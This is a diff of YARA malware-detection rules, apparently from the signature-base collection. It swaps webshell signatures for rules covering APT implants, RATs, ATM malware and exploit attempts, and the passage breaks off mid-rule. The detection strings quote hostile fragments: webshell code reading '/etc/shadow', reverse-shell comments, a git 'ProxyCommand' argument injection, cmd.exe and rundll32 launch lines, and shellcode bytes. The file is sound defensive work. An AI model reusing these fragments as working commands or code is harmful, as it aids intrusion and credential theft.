-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4616-L4629"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sakula.yar#L20-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "70a0ee2624e5bbe5525ccadc467519f6"
-		logic_hash = "32b3ddb00f89a3540118fe8ce5fc070556b00030dcf2b21245d38ae66e6cbc14"
+		hash = "b3852b9e7f2b8954be447121bb6b65c3"
+		logic_hash = "ba6d93a1fc5fd81748eb462fc55b681987126ba853ddb677a5f1f9b74ba5cde8"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "JspWebshell"
-		$s1 = "CreateAndDeleteFolder is error:"
-		$s2 = "<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryHashtable(\"java.c"
-		$s3 = "String _password =\"111\";"
+		$str01 = "cmd.exe /c ping 127.0.0.1 & del \"%s\""
+		$str02 = "cmd.exe /c rundll32 \"%s\" Play \"%s\""
+		$str03 = "Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+SV1)"
+		$str04 = "cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c \"%s\""
+		$str05 = "Self Process Id:%d"
+		$str06 = "%d_%d_%d_%s"
+		$str07 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
+		$str08 = "cmd.exe /c rundll32 \"%s\" ActiveQvaw \"%s\""
+		$opcodes01 = { 83 F9 00 74 0E 31 C0 8A 03 D0 C0 34 ?? 88 03 49 43 EB ED }
+		$opcodes02 = { 31 C0 8A 04 13 32 01 83 F8 00 75 0E 83 FA 00 74 04 49 4A }
 
 	condition:
-		2 of them
+		4 of them
 }
-rule SIGNATURE_BASE_Sincap_Php_Php
+rule SIGNATURE_BASE_Malware_Sakula_Shellcode
 {
 	meta:
-		description = "Semi-Auto-generated  - file Sincap.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "8c4dc7b1-94ce-5528-8442-eae05d2c9980"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "Sakula shellcode - taken from decoded setup.msi but may not be unique enough to identify Sakula"
+		author = "David Cannings"
+		id = "147e4894-7877-5367-9f6b-588eb7f0379a"
+		date = "2016-06-13"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4630-L4642"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sakula.yar#L47-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b68b90ff6012a103e57d141ed38a7ee9"
-		logic_hash = "e708a7dcb26ff7d0208c1f092e14e701f2ae94c4ffca019f13064bbe04ef74d7"
+		logic_hash = "0e84d91cd1bb0455ac7d2ca78583510388f39cebd95523c5f6f173a50e0c1951"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');"
-		$s2 = "$tampon4=$tampon3-1"
-		$s3 = "@aventgrup.net"
+		$opcodes01 = { 55 89 E5 E8 00 00 00 00 58 83 C0 06 C9 C3 }
+		$opcodes02 = { 8B 5E 3C 8B 5C 1E 78 8B 4C 1E 20 53 8B 5C 1E 24 01 F3 }
 
 	condition:
-		2 of them
+		any of them
 }
-rule SIGNATURE_BASE_Test_Php_Php
+rule SIGNATURE_BASE_Gen_Suspicious_Inpage_Dropper : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Test.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "58d73264-6507-5560-ad3e-0cc86c2ee291"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4643-L4655"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Florian Roth"
+		id = "9144711a-e6ee-5c97-a5f4-3f6df1d630dc"
+		date = "2019-07-03"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/Ahmedfshosha/status/1138138981521154049"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_InPage_dropper.yar#L1-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "77e331abd03b6915c6c6c7fe999fcb50"
-		logic_hash = "575a2eeadc8113d779057f98e978ed4f8914546117b57944bf65f1d6d84c9521"
-		score = 50
+		logic_hash = "8ab5d0bffa72b32f4c388f42a38a799c178fddf9f06b1262842e146c43448bd4"
+		score = 65
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "013417bd5465d6362cd43c70015c7a74a1b8979785b842b7cfa543cb85985852"
+		hash2 = "1d1e7a6175e6c514aaeca8a43dabefa017ddc5b166ccb636789b6a767181a022"
+		hash3 = "bd293bdf3be0a44a92bdb21e5fa75c124ad1afed3c869697bf90c9732af0e994"
+		hash4 = "d8edf3e69f006f85b9ee4e23704cd5e95e895eb286f9b749021d090448493b6f"
 
 	strings:
-		$s0 = "$yazi = \"test\" . \"\\r\\n\";" fullword
-		$s2 = "fwrite ($fp, \"$yazi\");" fullword
-		$s3 = "$entry_line=\"HACKed by EntriKa\";" fullword
+		$s1 = "InPage Arabic Document"
+		$c1 = {31 06 83 c6 04 e2 }
+		$c2 = {90 90 90 90 90 90 90 e8 fb }
 
 	condition:
-		1 of them
+		filesize < 3MB and uint32be( 0 ) == 0xD0CF11E0 and $s1 and 1 of ( $c* )
 }
-rule SIGNATURE_BASE_Phyton_Shell_Py
+rule SIGNATURE_BASE_ATM_Malware_Xfscashncr_1 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Phyton Shell.py.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "2f55d60d-94f3-508d-a2d0-5ab59e3fdab3"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4656-L4669"
+		description = "Detects ATM Malware XFSCashNCR"
+		author = "Frank Boldewin (@r3c0nst), modified by Florian Roth"
+		id = "0a70ef9a-9dde-54c9-a3a2-dfceff32932b"
+		date = "2019-08-28"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/r3c0nst/status/1166773324548063232"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_atm_xfscashncr.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "92b3c897090867c65cc169ab037a0f55"
-		logic_hash = "ac16a95cd1fb09c93b315e3cd7d57c1ebec322b641f515854fb73a61393dd365"
+		logic_hash = "014d07115543c6e041649a1c57206a75fd555bf0458c7578a33c81b473c72751"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "d6dff67a6b4423b5721908bdcc668951f33b3c214e318051c96e8c158e8931c0"
 
 	strings:
-		$s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword
-		$s2 = "#   d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword
-		$s3 = "print \"error; help: head -n 16 d00r.py\"" fullword
-		$s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword
+		$Code1 = {50 8b 4d e8 8b 51 10 52 6a 00 68 2d 01 00 00 8b 45 e8 0f b7 48 1c 51 e8}
+		$Code2 = {52 8d 45 d0 50 68 2e 01 00 00 8b 4d e8 0f b7 51 1c 52 e8}
+		$x_StatusMessage1 = "[+] Ingrese Denominacion ISO" nocase ascii
+		$x_StatusMessage2 = "[+] Ingrese numero de billetes" nocase ascii
+		$x_StatusMessage3 = "[!] FAIL.. dispensadores no encontrados" nocase ascii
+		$x_StatusMessage4 = "[!] Unable continue, IMPOSIBLE abrir dispenser" nocase ascii
+		$x_PDB = "C:\\Users\\cyttek\\Downloads\\xfs_cashXP\\Debug\\xfs_cash_ncr.pdb" nocase ascii
+		$LogFile = "XfsLog.txt" nocase ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5A4D and filesize < 1500KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Mysql_Tool_Php_Php
+rule SIGNATURE_BASE_EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 : CVE_2024_21413 FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file mysql_tool.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "c67197d1-6e40-5bf2-9e1b-6ada43529435"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4670-L4682"
+		description = "Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook"
+		author = "X__Junior, Florian Roth"
+		id = "4512ca7b-0755-565e-84f1-596552949aa5"
+		date = "2024-02-17"
+		modified = "2024-02-19"
+		reference = "https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_outlook_cve_2024_21413.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5fbe4d8edeb2769eda5f4add9bab901e"
-		logic_hash = "9f49bd6c56c919f678ecada82ff3d801c82c98a8abdee85cda1ec7e5b6756012"
+		logic_hash = "06cfafe0b92949e493dca6d54f671d0607242d97341144b69f563a0cc24dc6a1"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 60
+		tags = "CVE-2024-21413, FILE"
 
 	strings:
-		$s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['"
-		$s1 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV"
-		$s4 = "<div align=\"center\">The backup process has now started<br "
+		$a1 = "Subject: "
+		$a2 = "Received: "
+		$xr1 = /file:\/\/\/\\\\[^"']{6,600}\.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!/
 
 	condition:
-		1 of them
+		filesize < 1000KB and all of ( $a* ) and 1 of ( $xr* )
 }
-rule SIGNATURE_BASE_Zehir_4_Asp
+rule SIGNATURE_BASE_Git_CVE_2017_9800_Poc : CVE_2017_9800 FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Zehir 4.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ea7df4e1-d4e2-5a58-a014-d12cb9afaf79"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4683-L4694"
+		description = "Detects a CVE-2017-9800 exploitation attempt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1692eec4-a9af-5d00-97b8-badbe0ba0711"
+		date = "2017-08-11"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/mzbat/status/895811803325898753"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_9800.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7f4e12e159360743ec016273c3b9108c"
-		logic_hash = "69063d866daf1709df81fa22d76177bf8d552e19725a94db4a1b2fca79387faf"
-		score = 75
+		logic_hash = "1cfd0c5cb255d3ca63917c41c092df70d68b04f5d210a66abd5e35e509ff4beb"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "CVE-2017-9800, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time="
-		$s4 = "<input type=submit value=\"Test Et!\" onclick=\""
+		$s1 = "git clone ssh://-oProxyCommand=" ascii
+		$s2 = "git clone http://-" ascii
+		$s3 = "git clone https://-" ascii
 
 	condition:
-		1 of them
+		filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_Sh_Php_Php
+rule SIGNATURE_BASE_APT_Equation_Group_Op_Triangulation_Triangledb_Implant_Jun23_1 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "da691516-d6c9-5c4b-85c3-f1cd7fc96ae7"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4695-L4706"
+		description = "Detects TriangleDB implant found being used in Operation Triangulation on iOS devices (maybe also used on macOS systems)"
+		author = "Florian Roth"
+		id = "d81a5103-41c8-5dba-a560-8fb5514f6c0a"
+		date = "2023-06-21"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/triangledb-triangulation-implant/110050/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_triangulation_jun23.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "330af9337ae51d0bac175ba7076d6299"
-		logic_hash = "b0c3307d451e5d7dadece114e2888503a46038e2edb2ff32bf566ce47b300e76"
-		score = 75
+		logic_hash = "486b19ddb8b182dbba882359f7eb416735e76f9cda5aea1b290fb5c6b44960c5"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e"
-		$s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:"
+		$s1 = "unmungeHexString" ascii fullword
+		$s2 = "CRPwrInfo" ascii fullword
+		$s3 = "CRConfig" ascii fullword
+		$s4 = "CRXConfigureDBServer" ascii fullword
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0xfacf and filesize < 30MB and $s1 and 2 of them ) or all of them
 }
-rule SIGNATURE_BASE_Phpbackdoor15_Php
+
+rule SIGNATURE_BASE_Golddragon_Malware_Feb18_1 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file phpbackdoor15.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "a93b881b-3050-5f43-803c-4a571aaaef82"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4707-L4719"
+		description = "Detects malware from Gold Dragon report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1da29f0f-4e83-56a0-b843-3b19d9b9a1b7"
+		date = "2018-02-03"
+		modified = "2023-12-05"
+		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_golddragon.yar#L13-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0fdb401a49fc2e481e3dfd697078334b"
-		logic_hash = "cdd105f36593e8326ca32bf7cf1fba6fb754e7305c91fe6c078323db8f59b23c"
-		score = 75
+		logic_hash = "873cf7aa18027615fe8c44140879811254229a238f7d426144fb7c1a6e07ea74"
+		score = 90
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "168c2f7752511dfd263a83d5d08a90db" or pe.imphash ( ) == "0606858bdeb129de33a2b095d7806e74" or pe.imphash ( ) == "51d992f5b9e01533eb1356323ed1cb0f" or pe.imphash ( ) == "bb801224abd8562f9ee8fb261b75e32a" )
+}
+rule SIGNATURE_BASE_Golddragon_Aux_File : FILE
+{
+	meta:
+		description = "Detects export from Gold Dragon - February 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8f23dec4-e369-500f-a036-32df13e5543e"
+		date = "2018-02-03"
+		modified = "2023-12-05"
+		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_golddragon.yar#L31-L44"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "4c5eb04cdafe3a69e584c64b833d8c6d21890660e92cc050bb29798dbcdf5326"
+		score = 90
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na"
-		$s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI"
-		$s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s"
+		$x1 = "/////////////////////regkeyenum////////////" ascii
 
 	condition:
-		1 of them
+		filesize < 500KB and 1 of them
 }
-rule SIGNATURE_BASE_Phpjackal_Php
+
+rule SIGNATURE_BASE_Golddragon_Ghost419_RAT : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file phpjackal.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ae46cb97-1ff8-50ba-856f-c38fbb1e5163"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4720-L4731"
+		description = "Detects Ghost419 RAT from Gold Dragon report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8ac951d5-4a18-50c5-8ded-8a0a6b585fd6"
+		date = "2018-02-03"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/rW1yvZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_golddragon.yar#L46-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ab230817bcc99acb9bdc0ec6d264d76f"
-		logic_hash = "6e2ff262aecd08e5feaa274a7fd128d75565d6cc03341da7cbeb2949070705e5"
+		logic_hash = "b953c5e21c332add4ff3b8fef9d623904eb929b0e7fc86e6c7109cd81bc3819b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "45bfa1327c2c0118c152c7192ada429c6d4ae03b8164ebe36ab5ba9a84f5d7aa"
+		hash2 = "ee7a9a7589cbbcac8b6bf1a3d9c5d1c1ada98e68ac2f43ff93f768661b7e4a85"
+		hash3 = "dee482e5f461a8e531a6a7ea4728535aafdc4941a8939bc3c55f6cb28c46ad3d"
+		hash4 = "2df9e274ce0e71964aca4183cec01fb63566a907981a9e7384c0d73f86578fe4"
+		hash5 = "111ab6aa14ef1f8359c59b43778b76c7be5ca72dc1372a3603cd5814bfb2850d"
+		hash6 = "0ca12b78644f7e4141083dbb850acbacbebfd3cfa17a4849db844e3f7ef1bee5"
+		hash7 = "ae1b32aac4d8a35e2c62e334b794373c7457ebfaaab5e5e8e46f3928af07cde4"
+		hash8 = "c54837d0b856205bd4ae01887aae9178f55f16e0e1a1e1ff59bd18dbc8a3dd82"
+		hash9 = "db350bb43179f2a43a1330d82f3afeb900db5ff5094c2364d0767a3e6b97c854"
 
 	strings:
-		$s3 = "$dl=$_REQUEST['downloaD'];"
-		$s4 = "else shelL(\"perl.exe $name $port\");"
+		$x2 = "WebKitFormBoundarywhpFxMBe19cSjFnG" ascii
+		$x3 = "\\Microsoft\\HNC\\" ascii
+		$x4 = "\\anternet abplorer" ascii
+		$x5 = "%s\\abxplore.exe" fullword ascii
+		$x6 = "GHOST419" fullword ascii
+		$x7 = "I,m Online. %04d - %02d - %02d - %02d - %02d" fullword ascii
+		$x8 = "//////////////////////////regkeyenum//////////////" ascii
+		$s0 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)" fullword ascii
+		$s1 = "www.GoldDragon.com" fullword ascii
+		$s2 = "/c systeminfo >> %s" fullword ascii
+		$s3 = "/c dir %s\\ >> %s" fullword ascii
+		$s4 = "DownLoading %02x, %02x, %02x" fullword ascii
+		$s5 = "Tran_dll.dll" fullword ascii
+		$s6 = "MpCmdRunkr.dll" fullword ascii
+		$s7 = "MpCmdRun.dll" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( ( pe.exports ( "ExportFunction" ) and pe.number_of_exports == 1 ) or ( 1 of ( $x* ) and 1 of ( $s* ) ) or 3 of them )
 }
-rule SIGNATURE_BASE_Sql_Php_Php : FILE
+
+rule SIGNATURE_BASE_Golddragon_Runningrat : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file sql.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4732-L4745"
+		description = "Detects Running RAT from Gold Dragon report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7de93103-46a5-5aba-90cf-26735a6a580e"
+		date = "2018-02-03"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/rW1yvZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_golddragon.yar#L88-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8334249cbb969f2d33d678fec2b680c5"
-		logic_hash = "016ea01e9b53add0799f5c105fb3d54e6ee07d01c950772a618b2a780f14254f"
+		logic_hash = "02b0ac613bb01cb5bbe947661880070790bbb7c6ba9925e70bc200df34747a0b"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88"
+		hash2 = "2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863"
+		hash3 = "7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51"
 
 	strings:
-		$s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#"
-		$s2 = "http://rst.void.ru"
-		$s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
+		$x1 = "C:\\USERS\\WIN7_x64\\result.log" fullword wide
+		$x2 = "rundll32.exe %s RunningRat" fullword ascii
+		$x3 = "SystemRat.dll" fullword ascii
+		$x4 = "rundll32.exe %s ExportFunction" fullword ascii
+		$x5 = "rundll32.exe \"%s\" RunningRat" fullword ascii
+		$x6 = "ixeorat.bin" fullword ascii
+		$x7 = "C:\\USERS\\Public\\result.log" fullword ascii
+		$a1 = "emanybtsohteg" fullword ascii
+		$a2 = "tekcosesolc" fullword ascii
+		$a3 = "emankcosteg" fullword ascii
+		$a4 = "emantsohteg" fullword ascii
+		$a5 = "tpokcostes" fullword ascii
+		$a6 = "putratSASW" fullword ascii
+		$s1 = "ParentDll.dll" fullword ascii
+		$s2 = "MR - Already Existed" fullword ascii
+		$s3 = "MR First Started, Registed OK!" fullword ascii
+		$s4 = "RM-M : LoadResource OK!" fullword ascii
+		$s5 = "D:\\result.log" fullword ascii
 
 	condition:
-		1 of them and not uint32( 0 ) == 0x6D783F3C
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "c78ccc8f02286648c4373d3bf03efc43" or pe.exports ( "RunningRat" ) or 1 of ( $x* ) or 5 of ( $a* ) or 3 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Cgi_Python_Py
+rule SIGNATURE_BASE_Golddragon_Runnignrat : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file cgi-python.py.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "75e99d10-3cdf-5f87-9933-4ce5ebe18b09"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4746-L4758"
+		description = "Detects Running RAT malware from Gold Dragon report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b99b89a4-a764-5d72-8360-8e53461267d9"
+		date = "2018-02-03"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/rW1yvZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_golddragon.yar#L130-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0a15f473e2232b89dae1075e1afdac97"
-		logic_hash = "37c6c7db32a52c8a83ff85f0a50c6fa71e833b9e6d20b1f95e9512fe8bbd0aee"
+		logic_hash = "5bcc2ebbd54c31cf418430149eb558e8e26355161d0b53f403e7dfd2e1707baa"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "94aa827a514d7aa70c404ec326edaaad4b2b738ffaea5a66c0c9f246738df579"
+		hash2 = "5cbc07895d099ce39a3142025c557b7fac41d79914535ab7ffc2094809f12a4b"
+		hash3 = "98ccf3a463b81a47fdf4275e228a8f2266e613e08baae8bdcd098e49851ed49a"
 
 	strings:
-		$s0 = "a CGI by Fuzzyman"
-		$s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + "
-		$s2 = "values = map(lambda x: x.value, theform[field])     # allows for"
+		$s1 = "cmd.exe /c systeminfo " fullword ascii
+		$s2 = "ieproxy.dll" fullword ascii
+		$s3 = "taskkill /f /im daumcleaner.exe" fullword ascii
+		$s4 = "cmd.exe /c tasklist " fullword ascii
+		$s5 = "rundll32.exe \"%s\" Run" fullword ascii
+		$s6 = "Mozilla/5.0 (Windows NT 5.2; rv:12.0) Gecko/20100101 Firefox/12.0" fullword ascii
+		$s7 = "%s\\%s_%03d" fullword wide
+		$s8 = "\\PI_001.dat" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 3 of them )
 }
-rule SIGNATURE_BASE_Ru24_Post_Sh_Php_Php
+rule SIGNATURE_BASE_Mswin_Check_Lm_Group : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file ru24_post_sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "78669d3e-629b-591a-a766-923e37d1fdba"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4759-L4771"
+		description = "Chinese Hacktool Set - file mswin_check_lm_group.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "be17981a-7cbf-55ac-bc81-9330472fc814"
+		date = "2015-06-13"
+		modified = "2021-03-15"
+		reference = "http://tools.zjqhr.com/"
